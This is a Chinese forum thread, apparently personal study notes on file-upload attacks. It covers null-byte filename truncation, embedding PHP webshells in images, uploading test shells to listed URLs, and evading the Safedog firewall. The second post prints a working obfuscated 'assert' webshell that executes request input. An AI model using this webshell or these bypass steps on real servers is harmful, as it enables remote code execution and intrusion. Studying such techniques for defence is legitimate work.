搜索
搜索
本版
帖子
用户
老莫的笔记本
»
敲代码不为别的,就是为了找个媳妇
›
GIT与项目记录
›
LaoMo项目记录
›
上传文 测试学习记录
返回列表
查看:
1200
|
回复:
1
上传文 测试学习记录
[复制链接]
周大胖子
周大胖子
当前离线
积分
5167
664
主题
881
帖子
5167
积分
超级版主
积分
5167
发消息
发表于 2019-6-2 23:58:16
|
显示全部楼层
|
阅读模式
当字符有 %00(空字节) 就会被服务器认作为结束符。
空字节漏洞存在:
PHP 不同版本存在这个漏洞;
不同函数也存在这个漏洞;例如 转码 urldecode()
图片上传基本流程:
1.图片是否正常上传;
2.图片上传内容是否被感染(内容替换)
3.上传的域名是否是目标服务器;
3.1 如果不是那么判断图片服务器是否解析(php,asp....)
4.上传的目录是否支持解析(php aspx jsp cfm ---)
解释3与4: 所谓解析 就是判断目标服务器是否存在相应的代码运行环境
文件截断上传
走一遍视频后总结:
目标:上传的文件尾缀为.php 的 可运行文件 ;
前提条件:
1. 把图片右击用记事本打开,把PHP 一句话木马代码塞进去 再保存 ;
2. 文件成功上传 ;
3. 把上传的图片另存为存下来,再用编辑器打开, 看代码在不在【也就是被没被感染】,在就继续倒腾下面的
手段:黑盒测试中,利用
1. 修改文件名: a.php%00.jpg 、 a.php .jpg 、 a.jpg%00.php 、 a.jpg .php
2. 修改hash 值: 把指定位置改成 00 [可结合1 尝试]
获得图片路径
http://www.huake94.top/da/data/a ... vvnhvyvwsdnudpc.png
【这是上传到 下面是ftp上传到】
http://www.huake94.top/da/data/attachment/forum/201905/27/5.png
[小图模式 <是?的链接]
http://www.huake94.top/da/data/attachment/forum/201905/27/7.png
[< 直议模式 图模式]
http://www.huake94.top/da/data/attachment/forum/201905/27/52.php
[小图模式 <是?的链接 的PHP版本]
http://www.huake94.top/da/data/attachment/forum/201905/27/72.php
【直接把7改成了php 文件】
http://www.huake94.top/da/data/attachment/forum/201905/27/2.php
【直接连接】
实际情况 ,在我链接的时候 提示: 服务器连接被重置 ; 反应为 安全狗
参考资料:
http://www.360doc.com/content/18/0213/19/30583588_729816778.shtml
// 上述失败 采用变量方式 再尝试绕过PHP
采用第二种方式
一句话木马未改动版图片
http://a.wangjingting.top/upload/image/20190116/2.php
[小图模式 <是?的链接]
http://a.wangjingting.top/upload/image/20190116/7.png
[小图模式 <是?的链接]
http://a.wangjingting.top/upload/image/20190116/5.png
[< 直议模式 图模式]
http://a.wangjingting.top/upload/image/20190116/52.php
[小图模式 <是?的链接 的PHP版本]
http://a.wangjingting.top/upload/image/20190116/72.php
【直接把7改成了php 文件】
一句话木马 变量版 地址 【上述地址全部玩完,经检测 发现该变量版不行 倒是 7.png 可以访问, 特点: 被告该处了< 括号而不是编码?】
http://www.huake94.top/da/data/attachment/forum/201905/27/8.php
【直接连接】
http://www.huake94.top/da/data/attachment/forum/201905/27/48.php
【图片名称改掉】
http://www.huake94.top/da/data/attachment/forum/201905/27/48.png
【直接是图片】
我的主机版
http://a.wangjingting.top/upload/image/20190116/8.php
【直接连接】
http://a.wangjingting.top/upload/image/20190116/48.php
【图片名称改掉】
http://a.wangjingting.top/upload/image/20190116/48.png
【直接是图片】
参考文献:
https://blog.csdn.net/cic10235/article/details/52104010
【变量木马的制作 尝试绕过安全狗】
选用第三种 来自乌云的 一句话木马去你奶奶个腿版 6.PHP
参考文献:
https://www.secpulse.com/archives/38355.html
生成文件并上传:
http://a.wangjingting.top/upload/image/20190116/6.php
【直接连接】
http://a.wangjingting.top/upload/image/20190116/46.php
【图片名称改掉】
http://a.wangjingting.top/upload/image/20190116/46.png
【直接是图片】
回复
使用道具
举报
周大胖子
周大胖子
当前离线
积分
5167
664
主题
881
帖子
5167
积分
超级版主
积分
5167
发消息
楼主
|
发表于 2019-6-12 00:25:01
|
显示全部楼层
再次寻找 可以 过安全的一句话木马
https://www.freebuf.com/articles/web/125084.html
【这个是木马上传方式的整体思路】
木马链接位置:
http://a.wangjingting.top/upload/image/20190117/m.php
【
选用的语句4:
<?php
/*
PHP一句话木马
assert($string)
*/
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i<count($arr);$i++) {
$func .= $func . $arr[$i];
}
$func($_REQUEST['c']);
?>
】
回复
使用道具
举报
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表